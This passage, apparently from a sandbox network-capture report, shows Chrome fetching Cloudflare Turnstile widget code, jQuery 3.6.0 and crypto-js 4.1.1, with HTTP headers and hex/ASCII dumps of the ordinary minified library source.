                                        2025-02-15 19:34:48 UTC1369INData Raw: 6f 66 20 65 3d 3d 22 73 74 72 69 6e 67 22 26 26 4e 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 70 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 4c 2e 4e 4f 52 4d 41 4c 2c 4c 2e 43 4f 4d 50 41 43 54 2c 4c 2e 49 4e 56 49 53 49 42 4c 45 2c 4c 2e 46 4c 45 58 49 42 4c 45 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 76 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 75 74 6f 22 2c 22 6d 61 6e 75 61 6c 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 75 74 6f 22 2c 22 6d 61 6e 75 61 6c 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 76 61 72 20 6b 72 3d 2f 5e 5b 61 2d 7a 5d 7b 32 2c 33 7d 28 5b 2d 5f 5d 5b 61 2d 7a 5d 7b 32 7d 29 3f 24 2f 69 3b 66 75 6e 63 74 69 6f 6e 20 67 74 28 65
                                        Data Ascii: of e=="string"&&Nr.test(e)}function pt(e){return M([L.NORMAL,L.COMPACT,L.INVISIBLE,L.FLEXIBLE],e)}function vt(e){return M(["auto","manual","never"],e)}function mt(e){return M(["auto","manual","never"],e)}var kr=/^[a-z]{2,3}([-_][a-z]{2})?$/i;function gt(e
                                        2025-02-15 19:34:48 UTC1369INData Raw: 20 6f 3b 61 3d 28 6f 3d 65 5b 22 62 61 73 65 2d 75 72 6c 22 5d 29 21 3d 3d 6e 75 6c 6c 26 26 6f 21 3d 3d 76 6f 69 64 20 30 3f 6f 3a 61 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 52 74 28 65 2c 74 2c 61 2c 6f 2c 63 2c 6c 2c 67 2c 68 29 7b 76 61 72 20 73 3d 54 74 28 61 2c 63 29 2c 70 3d 6c 3f 22 68 2f 22 2e 63 6f 6e 63 61 74 28 6c 2c 22 2f 22 29 3a 22 22 2c 5f 3d 68 3f 22 3f 22 2e 63 6f 6e 63 61 74 28 68 29 3a 22 22 2c 49 3d 61 5b 22 66 65 65 64 62 61 63 6b 2d 65 6e 61 62 6c 65 64 22 5d 3d 3d 3d 21 31 3f 22 66 62 44 22 3a 22 66 62 45 22 3b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 73 2c 22 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 22 29 2e 63 6f 6e 63 61 74 28 70 2c 22 74 75 72 6e 73 74 69 6c 65
                                        Data Ascii: o;a=(o=e["base-url"])!==null&&o!==void 0?o:a}return a}function Rt(e,t,a,o,c,l,g,h){var s=Tt(a,c),p=l?"h/".concat(l,"/"):"",_=h?"?".concat(h):"",I=a["feedback-enabled"]===!1?"fbD":"fbE";return"".concat(s,"/cdn-cgi/challenge-platform/").concat(p,"turnstile
                                        2025-02-15 19:34:48 UTC1369INData Raw: 28 65 2c 74 29 7b 69 66 28 74 79 70 65 6f 66 20 74 21 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 74 21 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 74 65 28 65 2c 74 29 7d 66 75 6e 63 74 69 6f 6e 20 7a 65 28 29 7b 69 66 28 74 79 70 65 6f 66 20 52 65 66 6c 65 63 74 3d 3d 22 75 6e
                                        Data Ascii: (e,t){if(typeof t!="function"&&t!==null)throw new TypeError("Super expression must either be null or a function");e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,writable:!0,configurable:!0}}),t&&te(e,t)}function ze(){if(typeof Reflect=="un
                                        2025-02-15 19:34:48 UTC1369INData Raw: 22 7c 7c 74 79 70 65 6f 66 20 74 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 3f 74 3a 71 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 64 72 28 65 29 7b 76 61 72 20 74 3d 7a 65 28 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6f 3d 6c 65 28 65 29 2c 63 3b 69 66 28 74 29 7b 76 61 72 20 6c 3d 6c 65 28 74 68 69 73 29 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 63 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 6f 2c 61 72 67 75 6d 65 6e 74 73 2c 6c 29 7d 65 6c 73 65 20 63 3d 6f 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 73 72 28 74 68 69 73 2c 63 29 7d 7d 76 61 72 20 66 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 75 72 28 61 2c 65 29 3b 76 61 72 20 74 3d
                                        Data Ascii: "||typeof t=="function")?t:qe(e)}function dr(e){var t=ze();return function(){var o=le(e),c;if(t){var l=le(this).constructor;c=Reflect.construct(o,arguments,l)}else c=o.apply(this,arguments);return sr(this,c)}}var fr=function(e){"use strict";ur(a,e);var t=
                                        2025-02-15 19:34:48 UTC1369INData Raw: 2c 22 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 22 29 2e 63 6f 6e 63 61 74 28 63 2c 22 66 65 65 64 62 61 63 6b 2d 72 65 70 6f 72 74 73 2f 22 29 2e 63 6f 6e 63 61 74 28 58 65 28 65 29 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 74 2e 64 69 73 70 6c 61 79 4c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 28 6c 3d 74 2e 70 61 72 61 6d 73 2e 74 68 65 6d 65 29 21 3d 3d 6e 75 6c 6c 26 26 6c 21 3d 3d 76 6f 69 64 20 30 3f 6c 3a 74 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 61 29 3b 74 2e 77 72 61 70 70 65 72 2e 70 61 72 65 6e 74 4e 6f 64 65 7c 7c 6d 28 22 43 61 6e 6e 6f 74 20 69 6e 69 74 69 61 6c 69 7a 65 20 57 69 64 67 65 74 2c 20 45 6c 65 6d 65 6e 74 20 6e 6f 74 20 66 6f 75 6e 64 20 28 23 22 2e 63
                                        Data Ascii: ,"/cdn-cgi/challenge-platform/").concat(c,"feedback-reports/").concat(Xe(e),"/").concat(t.displayLanguage,"/").concat((l=t.params.theme)!==null&&l!==void 0?l:t.theme,"/").concat(a);t.wrapper.parentNode||m("Cannot initialize Widget, Element not found (#".c


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        7192.168.2.449751151.101.194.1374432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-02-15 19:34:48 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                        Host: code.jquery.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-02-15 19:34:48 UTC614INHTTP/1.1 200 OK
                                        Connection: close
                                        Content-Length: 89501
                                        Server: nginx
                                        Content-Type: application/javascript; charset=utf-8
                                        Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                        ETag: "28feccc0-15d9d"
                                        Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                        Access-Control-Allow-Origin: *
                                        Cross-Origin-Resource-Policy: cross-origin
                                        Via: 1.1 varnish, 1.1 varnish
                                        Accept-Ranges: bytes
                                        Date: Sat, 15 Feb 2025 19:34:48 GMT
                                        Age: 3401175
                                        X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740065-EWR
                                        X-Cache: HIT, HIT
                                        X-Cache-Hits: 2774, 74
                                        X-Timer: S1739648089.935803,VS0,VE0
                                        Vary: Accept-Encoding
                                        2025-02-15 19:34:48 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                        Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                        2025-02-15 19:34:48 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                        Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                        2025-02-15 19:34:48 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                        Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                        2025-02-15 19:34:48 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                        Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                        2025-02-15 19:34:48 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                        Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                        2025-02-15 19:34:48 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                        Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                        2025-02-15 19:34:48 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                        Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                        2025-02-15 19:34:48 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                        Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                        2025-02-15 19:34:48 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                        Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                        2025-02-15 19:34:48 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                        Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        8192.168.2.449752104.17.24.144432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-02-15 19:34:48 UTC386OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                        Host: cdnjs.cloudflare.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-02-15 19:34:49 UTC955INHTTP/1.1 200 OK
                                        Date: Sat, 15 Feb 2025 19:34:49 GMT
                                        Content-Type: application/javascript; charset=utf-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Access-Control-Allow-Origin: *
                                        Cache-Control: public, max-age=30672000
                                        ETag: W/"61182885-40eb"
                                        Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                        cf-cdnjs-via: cfworker/kv
                                        Cross-Origin-Resource-Policy: cross-origin
                                        Timing-Allow-Origin: *
                                        X-Content-Type-Options: nosniff
                                        CF-Cache-Status: HIT
                                        Age: 2015962
                                        Expires: Thu, 05 Feb 2026 19:34:49 GMT
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e7ne7G7JMPH6vf9oEzt8XGFCPLGox8RWxvMv32KqE0JwK3g3lLLsYs7s3aZXGeCflgpOuUas7SBxZdj%2FN8bkB9K4Wg2UZ4ftTWKhtysdoukJGctikpLiTfdDfcF0tNC8CNPanG0E"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                        Strict-Transport-Security: max-age=15780000
                                        Server: cloudflare
                                        CF-RAY: 9127bccc5ffb8c63-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2025-02-15 19:34:49 UTC414INData Raw: 33 39 37 36 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                        Data Ascii: 3976!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                        2025-02-15 19:34:49 UTC1369INData Raw: 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 7c
